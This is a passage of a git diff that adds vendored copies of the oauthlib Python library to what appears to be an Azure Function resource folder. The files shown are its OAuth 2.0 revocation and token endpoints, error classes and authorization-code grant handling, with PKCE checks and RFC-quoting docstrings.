RevocationEndpoint(BaseEndpoint): + + """Token revocation endpoint. + + Endpoint used by authenticated clients to revoke access and refresh tokens. + Commonly this will be part of the Authorization Endpoint. + """ + + valid_token_types = ('access_token', 'refresh_token') + valid_request_methods = ('POST',) + + def __init__(self, request_validator, supported_token_types=None, + enable_jsonp=False): + BaseEndpoint.__init__(self) + self.request_validator = request_validator + self.supported_token_types = ( + supported_token_types or self.valid_token_types) + self.enable_jsonp = enable_jsonp + + @catch_errors_and_unavailability + def create_revocation_response(self, uri, http_method='POST', body=None, + headers=None): + """Revoke supplied access or refresh token. + + + The authorization server responds with HTTP status code 200 if the + token has been revoked sucessfully or if the client submitted an + invalid token. + + Note: invalid tokens do not cause an error response since the client + cannot handle such an error in a reasonable way. Moreover, the purpose + of the revocation request, invalidating the particular token, is + already achieved. + + The content of the response body is ignored by the client as all + necessary information is conveyed in the response code. + + An invalid token type hint value is ignored by the authorization server + and does not influence the revocation response. + """ + resp_headers = { + 'Content-Type': 'application/json', + 'Cache-Control': 'no-store', + 'Pragma': 'no-cache', + } + request = Request( + uri, http_method=http_method, body=body, headers=headers) + try: + self.validate_revocation_request(request) + log.debug('Token revocation valid for %r.', request) + except OAuth2Error as e: + log.debug('Client error during validation of %r. %r.', request, e) + response_body = e.json + if self.enable_jsonp and request.callback: + response_body = '{}({});'.format(request.callback, response_body) + resp_headers.update(e.headers) + return resp_headers, response_body, e.status_code + + self.request_validator.revoke_token(request.token, + request.token_type_hint, request) + + response_body = '' + if self.enable_jsonp and request.callback: + response_body = request.callback + '();' + return {}, response_body, 200 + + def validate_revocation_request(self, request): + """Ensure the request is valid. + + The client constructs the request by including the following parameters + using the "application/x-www-form-urlencoded" format in the HTTP + request entity-body: + + token (REQUIRED). The token that the client wants to get revoked. + + token_type_hint (OPTIONAL). A hint about the type of the token + submitted for revocation. Clients MAY pass this parameter in order to + help the authorization server to optimize the token lookup. If the + server is unable to locate the token using the given hint, it MUST + extend its search accross all of its supported token types. An + authorization server MAY ignore this parameter, particularly if it is + able to detect the token type automatically. This specification + defines two such values: + + * access_token: An Access Token as defined in [RFC6749], + `section 1.4`_ + + * refresh_token: A Refresh Token as defined in [RFC6749], + `section 1.5`_ + + Specific implementations, profiles, and extensions of this + specification MAY define other values for this parameter using + the registry defined in `Section 4.1.2`_. + + The client also includes its authentication credentials as described in + `Section 2.3`_. of [`RFC6749`_]. + + .. _`section 1.4`: https://tools.ietf.org/html/rfc6749#section-1.4 + .. _`section 1.5`: https://tools.ietf.org/html/rfc6749#section-1.5 + .. _`section 2.3`: https://tools.ietf.org/html/rfc6749#section-2.3 + .. _`Section 4.1.2`: https://tools.ietf.org/html/draft-ietf-oauth-revocation-11#section-4.1.2 + .. _`RFC6749`: https://tools.ietf.org/html/rfc6749 + """ + self._raise_on_bad_method(request) + self._raise_on_bad_post_request(request) + self._raise_on_missing_token(request) + self._raise_on_invalid_client(request) + self._raise_on_unsupported_token(request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/token.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/token.py new file mode 100644 index 0000000..ffcfbc8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/token.py @@ -0,0 +1,119 @@ +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +import logging + +from oauthlib.common import Request +from oauthlib.oauth2.rfc6749 import utils + +from .base import BaseEndpoint, catch_errors_and_unavailability + +log = logging.getLogger(__name__) + + +class TokenEndpoint(BaseEndpoint): + + """Token issuing endpoint. + + The token endpoint is used by the client to obtain an access token by + presenting its authorization grant or refresh token. The token + endpoint is used with every authorization grant except for the + implicit grant type (since an access token is issued directly). + + The means through which the client obtains the location of the token + endpoint are beyond the scope of this specification, but the location + is typically provided in the service documentation. + + The endpoint URI MAY include an "application/x-www-form-urlencoded" + formatted (per `Appendix B`_) query component, + which MUST be retained when adding additional query parameters. The + endpoint URI MUST NOT include a fragment component:: + + https://example.com/path?query=component # OK + https://example.com/path?query=component#fragment # Not OK + + Since requests to the token endpoint result in the transmission of + clear-text credentials (in the HTTP request and response), the + authorization server MUST require the use of TLS as described in + Section 1.6 when sending requests to the token endpoint:: + + # We will deny any request which URI schema is not with https + + The client MUST use the HTTP "POST" method when making access token + requests:: + + # HTTP method is currently not enforced + + Parameters sent without a value MUST be treated as if they were + omitted from the request. The authorization server MUST ignore + unrecognized request parameters. Request and response parameters + MUST NOT be included more than once:: + + # Delegated to each grant type. + + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + """ + + valid_request_methods = ('POST',) + + def __init__(self, default_grant_type, default_token_type, grant_types): + BaseEndpoint.__init__(self) + self._grant_types = grant_types + self._default_token_type = default_token_type + self._default_grant_type = default_grant_type + + @property + def grant_types(self): + return self._grant_types + + @property + def default_grant_type(self): + return self._default_grant_type + + @property + def default_grant_type_handler(self): + return self.grant_types.get(self.default_grant_type) + + @property + def default_token_type(self): + return self._default_token_type + + @catch_errors_and_unavailability + def create_token_response(self, uri, http_method='POST', body=None, + headers=None, credentials=None, grant_type_for_scope=None, + claims=None): + """Extract grant_type and route to the designated handler.""" + request = Request( + uri, http_method=http_method, body=body, headers=headers) + self.validate_token_request(request) + # 'scope' is an allowed Token Request param in both the "Resource Owner Password Credentials Grant" + # and "Client Credentials Grant" flows + # https://tools.ietf.org/html/rfc6749#section-4.3.2 + # https://tools.ietf.org/html/rfc6749#section-4.4.2 + request.scopes = utils.scope_to_list(request.scope) + + request.extra_credentials = credentials + if grant_type_for_scope: + request.grant_type = grant_type_for_scope + + # OpenID Connect claims, if provided. The server using oauthlib might choose + # to implement the claims parameter of the Authorization Request. In this case + # it should retrieve those claims and pass them via the claims argument here, + # as a dict. + if claims: + request.claims = claims + + grant_type_handler = self.grant_types.get(request.grant_type, + self.default_grant_type_handler) + log.debug('Dispatching grant_type %s request to %r.', + request.grant_type, grant_type_handler) + return grant_type_handler.create_token_response( + request, self.default_token_type) + + def validate_token_request(self, request): + self._raise_on_bad_method(request) + self._raise_on_bad_post_request(request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/errors.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/errors.py new file mode 100644 index 0000000..f5bd690 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/errors.py @@ -0,0 +1,400 @@ +""" +oauthlib.oauth2.rfc6749.errors +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Error used both by OAuth 2 clients and providers to represent the spec +defined error responses for all four core grant types. +""" +import json + +from oauthlib.common import add_params_to_uri, urlencode + + +class OAuth2Error(Exception): + error = None + status_code = 400 + description = '' + + def __init__(self, description=None, uri=None, state=None, + status_code=None, request=None): + """ + :param description: A human-readable ASCII [USASCII] text providing + additional information, used to assist the client + developer in understanding the error that occurred. + Values for the "error_description" parameter + MUST NOT include characters outside the set + x20-21 / x23-5B / x5D-7E. + + :param uri: A URI identifying a human-readable web page with information + about the error, used to provide the client developer with + additional information about the error. Values for the + "error_uri" parameter MUST conform to the URI- Reference + syntax, and thus MUST NOT include characters outside the set + x21 / x23-5B / x5D-7E. + + :param state: A CSRF protection value received from the client. + + :param status_code: + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + if description is not None: + self.description = description + + message = '({}) {}'.format(self.error, self.description) + if request: + message += ' ' + repr(request) + super().__init__(message) + + self.uri = uri + self.state = state + + if status_code: + self.status_code = status_code + + if request: + self.redirect_uri = request.redirect_uri + self.client_id = request.client_id + self.scopes = request.scopes + self.response_type = request.response_type + self.response_mode = request.response_mode + self.grant_type = request.grant_type + if not state: + self.state = request.state + else: + self.redirect_uri = None + self.client_id = None + self.scopes = None + self.response_type = None + self.response_mode = None + self.grant_type = None + + def in_uri(self, uri): + fragment = self.response_mode == "fragment" + return add_params_to_uri(uri, self.twotuples, fragment) + + @property + def twotuples(self): + error = [('error', self.error)] + if self.description: + error.append(('error_description', self.description)) + if self.uri: + error.append(('error_uri', self.uri)) + if self.state: + error.append(('state', self.state)) + return error + + @property + def urlencoded(self): + return urlencode(self.twotuples) + + @property + def json(self): + return json.dumps(dict(self.twotuples)) + + @property + def headers(self): + if self.status_code == 401: + """ + https://tools.ietf.org/html/rfc6750#section-3 + + All challenges defined by this specification MUST use the auth-scheme + value "Bearer". This scheme MUST be followed by one or more + auth-param values. + """ + authvalues = ['error="{}"'.format(self.error)] + if self.description: + authvalues.append('error_description="{}"'.format(self.description)) + if self.uri: + authvalues.append('error_uri="{}"'.format(self.uri)) + return {"WWW-Authenticate": "Bearer " + ", ".join(authvalues)} + return {} + + +class TokenExpiredError(OAuth2Error): + error = 'token_expired' + + +class InsecureTransportError(OAuth2Error): + error = 'insecure_transport' + description = 'OAuth 2 MUST utilize https.' + + +class MismatchingStateError(OAuth2Error): + error = 'mismatching_state' + description = 'CSRF Warning! State not equal in request and response.' + + +class MissingCodeError(OAuth2Error): + error = 'missing_code' + + +class MissingTokenError(OAuth2Error): + error = 'missing_token' + + +class MissingTokenTypeError(OAuth2Error): + error = 'missing_token_type' + + +class FatalClientError(OAuth2Error): + """ + Errors during authorization where user should not be redirected back. + + If the request fails due to a missing, invalid, or mismatching + redirection URI, or if the client identifier is missing or invalid, + the authorization server SHOULD inform the resource owner of the + error and MUST NOT automatically redirect the user-agent to the + invalid redirection URI. + + Instead the user should be informed of the error by the provider itself. + """ + pass + + +class InvalidRequestFatalError(FatalClientError): + """ + For fatal errors, the request is missing a required parameter, includes + an invalid parameter value, includes a parameter more than once, or is + otherwise malformed. + """ + error = 'invalid_request' + + +class InvalidRedirectURIError(InvalidRequestFatalError): + description = 'Invalid redirect URI.' + + +class MissingRedirectURIError(InvalidRequestFatalError): + description = 'Missing redirect URI.' + + +class MismatchingRedirectURIError(InvalidRequestFatalError): + description = 'Mismatching redirect URI.' + + +class InvalidClientIdError(InvalidRequestFatalError): + description = 'Invalid client_id parameter value.' + + +class MissingClientIdError(InvalidRequestFatalError): + description = 'Missing client_id parameter.' + + +class InvalidRequestError(OAuth2Error): + """ + The request is missing a required parameter, includes an invalid + parameter value, includes a parameter more than once, or is + otherwise malformed. + """ + error = 'invalid_request' + + +class MissingResponseTypeError(InvalidRequestError): + description = 'Missing response_type parameter.' + + +class MissingCodeChallengeError(InvalidRequestError): + """ + If the server requires Proof Key for Code Exchange (PKCE) by OAuth + public clients and the client does not send the "code_challenge" in + the request, the authorization endpoint MUST return the authorization + error response with the "error" value set to "invalid_request". The + "error_description" or the response of "error_uri" SHOULD explain the + nature of error, e.g., code challenge required. + """ + description = 'Code challenge required.' + + +class MissingCodeVerifierError(InvalidRequestError): + """ + The request to the token endpoint, when PKCE is enabled, has + the parameter `code_verifier` REQUIRED. + """ + description = 'Code verifier required.' + + +class AccessDeniedError(OAuth2Error): + """ + The resource owner or authorization server denied the request. + """ + error = 'access_denied' + + +class UnsupportedResponseTypeError(OAuth2Error): + """ + The authorization server does not support obtaining an authorization + code using this method. + """ + error = 'unsupported_response_type' + + +class UnsupportedCodeChallengeMethodError(InvalidRequestError): + """ + If the server supporting PKCE does not support the requested + transformation, the authorization endpoint MUST return the + authorization error response with "error" value set to + "invalid_request". The "error_description" or the response of + "error_uri" SHOULD explain the nature of error, e.g., transform + algorithm not supported. + """ + description = 'Transform algorithm not supported.' + + +class InvalidScopeError(OAuth2Error): + """ + The requested scope is invalid, unknown, or malformed, or + exceeds the scope granted by the resource owner. + + https://tools.ietf.org/html/rfc6749#section-5.2 + """ + error = 'invalid_scope' + + +class ServerError(OAuth2Error): + """ + The authorization server encountered an unexpected condition that + prevented it from fulfilling the request. (This error code is needed + because a 500 Internal Server Error HTTP status code cannot be returned + to the client via a HTTP redirect.) + """ + error = 'server_error' + + +class TemporarilyUnavailableError(OAuth2Error): + """ + The authorization server is currently unable to handle the request + due to a temporary overloading or maintenance of the server. + (This error code is needed because a 503 Service Unavailable HTTP + status code cannot be returned to the client via a HTTP redirect.) + """ + error = 'temporarily_unavailable' + + +class InvalidClientError(FatalClientError): + """ + Client authentication failed (e.g. unknown client, no client + authentication included, or unsupported authentication method). + The authorization server MAY return an HTTP 401 (Unauthorized) status + code to indicate which HTTP authentication schemes are supported. + If the client attempted to authenticate via the "Authorization" request + header field, the authorization server MUST respond with an + HTTP 401 (Unauthorized) status code, and include the "WWW-Authenticate" + response header field matching the authentication scheme used by the + client. + """ + error = 'invalid_client' + status_code = 401 + + +class InvalidGrantError(OAuth2Error): + """ + The provided authorization grant (e.g. authorization code, resource + owner credentials) or refresh token is invalid, expired, revoked, does + not match the redirection URI used in the authorization request, or was + issued to another client. + + https://tools.ietf.org/html/rfc6749#section-5.2 + """ + error = 'invalid_grant' + status_code = 400 + + +class UnauthorizedClientError(OAuth2Error): + """ + The authenticated client is not authorized to use this authorization + grant type. + """ + error = 'unauthorized_client' + + +class UnsupportedGrantTypeError(OAuth2Error): + """ + The authorization grant type is not supported by the authorization + server. + """ + error = 'unsupported_grant_type' + + +class UnsupportedTokenTypeError(OAuth2Error): + """ + The authorization server does not support the hint of the + presented token type. I.e. the client tried to revoke an access token + on a server not supporting this feature. + """ + error = 'unsupported_token_type' + + +class InvalidTokenError(OAuth2Error): + """ + The access token provided is expired, revoked, malformed, or + invalid for other reasons. The resource SHOULD respond with + the HTTP 401 (Unauthorized) status code. The client MAY + request a new access token and retry the protected resource + request. + """ + error = 'invalid_token' + status_code = 401 + description = ("The access token provided is expired, revoked, malformed, " + "or invalid for other reasons.") + + +class InsufficientScopeError(OAuth2Error): + """ + The request requires higher privileges than provided by the + access token. The resource server SHOULD respond with the HTTP + 403 (Forbidden) status code and MAY include the "scope" + attribute with the scope necessary to access the protected + resource. + """ + error = 'insufficient_scope' + status_code = 403 + description = ("The request requires higher privileges than provided by " + "the access token.") + + +class ConsentRequired(OAuth2Error): + """ + The Authorization Server requires End-User consent. + + This error MAY be returned when the prompt parameter value in the + Authentication Request is none, but the Authentication Request cannot be + completed without displaying a user interface for End-User consent. + """ + error = 'consent_required' + + +class LoginRequired(OAuth2Error): + """ + The Authorization Server requires End-User authentication. + + This error MAY be returned when the prompt parameter value in the + Authentication Request is none, but the Authentication Request cannot be + completed without displaying a user interface for End-User authentication. + """ + error = 'login_required' + + +class CustomOAuth2Error(OAuth2Error): + """ + This error is a placeholder for all custom errors not described by the RFC. + Some of the popular OAuth2 providers are using custom errors. + """ + def __init__(self, error, *args, **kwargs): + self.error = error + super().__init__(*args, **kwargs) + + +def raise_from_error(error, params=None): + import inspect + import sys + kwargs = { + 'description': params.get('error_description'), + 'uri': params.get('error_uri'), + 'state': params.get('state') + } + for _, cls in inspect.getmembers(sys.modules[__name__], inspect.isclass): + if cls.error == error: + raise cls(**kwargs) + raise CustomOAuth2Error(error=error, **kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__init__.py new file mode 100644 index 0000000..0de3db3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__init__.py @@ -0,0 +1,11 @@ +""" +oauthlib.oauth2.rfc6749.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +from .authorization_code import AuthorizationCodeGrant +from .client_credentials import ClientCredentialsGrant +from .implicit import ImplicitGrant +from .refresh_token import RefreshTokenGrant +from .resource_owner_password_credentials import ( + ResourceOwnerPasswordCredentialsGrant, +) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..60803c1 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/authorization_code.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/authorization_code.cpython-39.pyc new file mode 100644 index 0000000..f64e87c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/authorization_code.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..969eef5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-39.pyc new file mode 100644 index 0000000..fbce740 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/implicit.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/implicit.cpython-39.pyc new file mode 100644 index 0000000..af4503f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/implicit.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/refresh_token.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/refresh_token.cpython-39.pyc new file mode 100644 index 0000000..b3a787e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/refresh_token.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-39.pyc new file mode 100644 index 0000000..bc90728 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/authorization_code.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/authorization_code.py new file mode 100644 index 0000000..bfef438 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/authorization_code.py @@ -0,0 +1,566 @@ +""" +oauthlib.oauth2.rfc6749.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import base64 +import hashlib +import json +import logging + +from oauthlib import common + +from .. import errors +from ..utils import is_secure_transport +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +def code_challenge_method_s256(verifier, challenge): + """ + If the "code_challenge_method" from `Section 4.3`_ was "S256", the + received "code_verifier" is hashed by SHA-256, base64url-encoded, and + then compared to the "code_challenge", i.e.: + + BASE64URL-ENCODE(SHA256(ASCII(code_verifier))) == code_challenge + + How to implement a base64url-encoding + function without padding, based upon the standard base64-encoding + function that uses padding. + + To be concrete, example C# code implementing these functions is shown + below. Similar code could be used in other languages. + + static string base64urlencode(byte [] arg) + { + string s = Convert.ToBase64String(arg); // Regular base64 encoder + s = s.Split('=')[0]; // Remove any trailing '='s + s = s.Replace('+', '-'); // 62nd char of encoding + s = s.Replace('/', '_'); // 63rd char of encoding + return s; + } + + In python urlsafe_b64encode is already replacing '+' and '/', but preserve + the trailing '='. So we have to remove it. + + .. _`Section 4.3`: https://tools.ietf.org/html/rfc7636#section-4.3 + """ + return base64.urlsafe_b64encode( + hashlib.sha256(verifier.encode()).digest() + ).decode().rstrip('=') == challenge + + +def code_challenge_method_plain(verifier, challenge): + """ + If the "code_challenge_method" from `Section 4.3`_ was "plain", they are + compared directly, i.e.: + + code_verifier == code_challenge. + + .. _`Section 4.3`: https://tools.ietf.org/html/rfc7636#section-4.3 + """ + return verifier == challenge + + +class AuthorizationCodeGrant(GrantTypeBase): + + """`Authorization Code Grant`_ + + The authorization code grant type is used to obtain both access + tokens and refresh tokens and is optimized for confidential clients. + Since this is a redirection-based flow, the client must be capable of + interacting with the resource owner's user-agent (typically a web + browser) and capable of receiving incoming requests (via redirection) + from the authorization server:: + + +----------+ + | Resource | + | Owner | + | | + +----------+ + ^ + | + (B) + +----|-----+ Client Identifier +---------------+ + | -+----(A)-- & Redirection URI ---->| | + | User- | | Authorization | + | Agent -+----(B)-- User authenticates --->| Server | + | | | | + | -+----(C)-- Authorization Code ---<| | + +-|----|---+ +---------------+ + | | ^ v + (A) (C) | | + | | | | + ^ v | | + +---------+ | | + | |>---(D)-- Authorization Code ---------' | + | Client | & Redirection URI | + | | | + | |<---(E)----- Access Token -------------------' + +---------+ (w/ Optional Refresh Token) + + Note: The lines illustrating steps (A), (B), and (C) are broken into + two parts as they pass through the user-agent. + + Figure 3: Authorization Code Flow + + The flow illustrated in Figure 3 includes the following steps: + + (A) The client initiates the flow by directing the resource owner's + user-agent to the authorization endpoint. The client includes + its client identifier, requested scope, local state, and a + redirection URI to which the authorization server will send the + user-agent back once access is granted (or denied). + + (B) The authorization server authenticates the resource owner (via + the user-agent) and establishes whether the resource owner + grants or denies the client's access request. + + (C) Assuming the resource owner grants access, the authorization + server redirects the user-agent back to the client using the + redirection URI provided earlier (in the request or during + client registration). The redirection URI includes an + authorization code and any local state provided by the client + earlier. + + (D) The client requests an access token from the authorization + server's token endpoint by including the authorization code + received in the previous step. When making the request, the + client authenticates with the authorization server. The client + includes the redirection URI used to obtain the authorization + code for verification. + + (E) The authorization server authenticates the client, validates the + authorization code, and ensures that the redirection URI + received matches the URI used to redirect the client in + step (C). If valid, the authorization server responds back with + an access token and, optionally, a refresh token. + + OAuth 2.0 public clients utilizing the Authorization Code Grant are + susceptible to the authorization code interception attack. + + A technique to mitigate against the threat through the use of Proof Key for Code + Exchange (PKCE, pronounced "pixy") is implemented in the current oauthlib + implementation. + + .. _`Authorization Code Grant`: https://tools.ietf.org/html/rfc6749#section-4.1 + .. _`PKCE`: https://tools.ietf.org/html/rfc7636 + """ + + default_response_mode = 'query' + response_types = ['code'] + + # This dict below is private because as RFC mention it: + # "S256" is Mandatory To Implement (MTI) on the server. + # + _code_challenge_methods = { + 'plain': code_challenge_method_plain, + 'S256': code_challenge_method_s256 + } + + def create_authorization_code(self, request): + """ + Generates an authorization grant represented as a dictionary. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + grant = {'code': common.generate_token()} + if hasattr(request, 'state') and request.state: + grant['state'] = request.state + log.debug('Created authorization code grant %r for request %r.', + grant, request) + return grant + + def create_authorization_response(self, request, token_handler): + """ + The client constructs the request URI by adding the following + parameters to the query component of the authorization endpoint URI + using the "application/x-www-form-urlencoded" format, per `Appendix B`_: + + response_type + REQUIRED. Value MUST be set to "code" for standard OAuth2 + authorization flow. For OpenID Connect it must be one of + "code token", "code id_token", or "code token id_token" - we + essentially test that "code" appears in the response_type. + client_id + REQUIRED. The client identifier as described in `Section 2.2`_. + redirect_uri + OPTIONAL. As described in `Section 3.1.2`_. + scope + OPTIONAL. The scope of the access request as described by + `Section 3.3`_. + state + RECOMMENDED. An opaque value used by the client to maintain + state between the request and callback. The authorization + server includes this value when redirecting the user-agent back + to the client. The parameter SHOULD be used for preventing + cross-site request forgery as described in `Section 10.12`_. + + The client directs the resource owner to the constructed URI using an + HTTP redirection response, or by other means available to it via the + user-agent. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + :returns: headers, body, status + :raises: FatalClientError on invalid redirect URI or client id. + + A few examples:: + + >>> from your_validator import your_validator + >>> request = Request('https://example.com/authorize?client_id=valid' + ... '&redirect_uri=http%3A%2F%2Fclient.com%2F') + >>> from oauthlib.common import Request + >>> from oauthlib.oauth2 import AuthorizationCodeGrant, BearerToken + >>> token = BearerToken(your_validator) + >>> grant = AuthorizationCodeGrant(your_validator) + >>> request.scopes = ['authorized', 'in', 'some', 'form'] + >>> grant.create_authorization_response(request, token) + (u'http://client.com/?error=invalid_request&error_description=Missing+response_type+parameter.', None, None, 400) + >>> request = Request('https://example.com/authorize?client_id=valid' + ... '&redirect_uri=http%3A%2F%2Fclient.com%2F' + ... '&response_type=code') + >>> request.scopes = ['authorized', 'in', 'some', 'form'] + >>> grant.create_authorization_response(request, token) + (u'http://client.com/?code=u3F05aEObJuP2k7DordviIgW5wl52N', None, None, 200) + >>> # If the client id or redirect uri fails validation + >>> grant.create_authorization_response(request, token) + Traceback (most recent call last): + File "", line 1, in + File "oauthlib/oauth2/rfc6749/grant_types.py", line 515, in create_authorization_response + >>> grant.create_authorization_response(request, token) + File "oauthlib/oauth2/rfc6749/grant_types.py", line 591, in validate_authorization_request + oauthlib.oauth2.rfc6749.errors.InvalidClientIdError + + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + .. _`Section 2.2`: https://tools.ietf.org/html/rfc6749#section-2.2 + .. _`Section 3.1.2`: https://tools.ietf.org/html/rfc6749#section-3.1.2 + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`Section 10.12`: https://tools.ietf.org/html/rfc6749#section-10.12 + """ + try: + self.validate_authorization_request(request) + log.debug('Pre resource owner authorization validation ok for %r.', + request) + + # If the request fails due to a missing, invalid, or mismatching + # redirection URI, or if the client identifier is missing or invalid, + # the authorization server SHOULD inform the resource owner of the + # error and MUST NOT automatically redirect the user-agent to the + # invalid redirection URI. + except errors.FatalClientError as e: + log.debug('Fatal client error during validation of %r. %r.', + request, e) + raise + + # If the resource owner denies the access request or if the request + # fails for reasons other than a missing or invalid redirection URI, + # the authorization server informs the client by adding the following + # parameters to the query component of the redirection URI using the + # "application/x-www-form-urlencoded" format, per Appendix B: + # https://tools.ietf.org/html/rfc6749#appendix-B + except errors.OAuth2Error as e: + log.debug('Client error during validation of %r. %r.', request, e) + request.redirect_uri = request.redirect_uri or self.error_uri + redirect_uri = common.add_params_to_uri( + request.redirect_uri, e.twotuples, + fragment=request.response_mode == "fragment") + return {'Location': redirect_uri}, None, 302 + + grant = self.create_authorization_code(request) + for modifier in self._code_modifiers: + grant = modifier(grant, token_handler, request) + if 'access_token' in grant: + self.request_validator.save_token(grant, request) + log.debug('Saving grant %r for %r.', grant, request) + self.request_validator.save_authorization_code( + request.client_id, grant, request) + return self.prepare_authorization_response( + request, grant, {}, None, 302) + + def create_token_response(self, request, token_handler): + """Validate the authorization code. + + The client MUST NOT use the authorization code more than once. If an + authorization code is used more than once, the authorization server + MUST deny the request and SHOULD revoke (when possible) all tokens + previously issued based on that authorization code. The authorization + code is bound to the client identifier and redirection URI. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + + """ + headers = self._get_default_headers() + try: + self.validate_token_request(request) + log.debug('Token request validation ok for %r.', request) + except errors.OAuth2Error as e: + log.debug('Client error during validation of %r. %r.', request, e) + headers.update(e.headers) + return headers, e.json, e.status_code + + token = token_handler.create_token(request, refresh_token=self.refresh_token) + + for modifier in self._token_modifiers: + token = modifier(token, token_handler, request) + + self.request_validator.save_token(token, request) + self.request_validator.invalidate_authorization_code( + request.client_id, request.code, request) + headers.update(self._create_cors_headers(request)) + return headers, json.dumps(token), 200 + + def validate_authorization_request(self, request): + """Check the authorization request for normal and fatal errors. + + A normal error could be a missing response_type parameter or the client + attempting to access scope it is not allowed to ask authorization for. + Normal errors can safely be included in the redirection URI and + sent back to the client. + + Fatal errors occur when the client_id or redirect_uri is invalid or + missing. These must be caught by the provider and handled, how this + is done is outside of the scope of OAuthLib but showing an error + page describing the issue is a good idea. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + + # First check for fatal errors + + # If the request fails due to a missing, invalid, or mismatching + # redirection URI, or if the client identifier is missing or invalid, + # the authorization server SHOULD inform the resource owner of the + # error and MUST NOT automatically redirect the user-agent to the + # invalid redirection URI. + + # First check duplicate parameters + for param in ('client_id', 'response_type', 'redirect_uri', 